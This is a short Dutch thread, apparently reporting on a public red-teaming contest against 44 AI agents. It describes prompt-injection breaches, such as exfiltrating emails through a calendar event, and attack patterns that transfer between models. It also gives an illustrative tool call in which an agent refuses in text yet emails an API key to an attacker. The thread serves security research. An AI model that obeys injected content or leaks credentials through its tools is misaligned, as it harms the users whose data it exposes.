We hebben 44 AI-agenten ingezet en het internet $170K aangeboden om hen aan te vallen. 1,8 miljoen pogingen, 62K inbreuken, waaronder datalekken en financiële verliezen. 🚨 Bezorgdwekkend is dat dezelfde exploits overgaan naar live productieagenten… (voorbeeld: e-mails exfiltreren via een kalender evenement) 🧵

Veel breuken zijn universeel en overdraagbaar. Kopieer‑plakpatronen werkten over taken, modellen en beveiligingsmaatregelen. Als het vandaag één agent breekt, is de kans groot dat het ook de jouwe breekt.

Favoriete mislukking: “weiger in tekst, handel in tools.” 😈 Model: “Ik kan geen inloggegevens delen.” Dan: stuur_email(naar=aanvaller, body="API_KEY=****") De UI ziet er veilig uit; de toollaag doet de schade.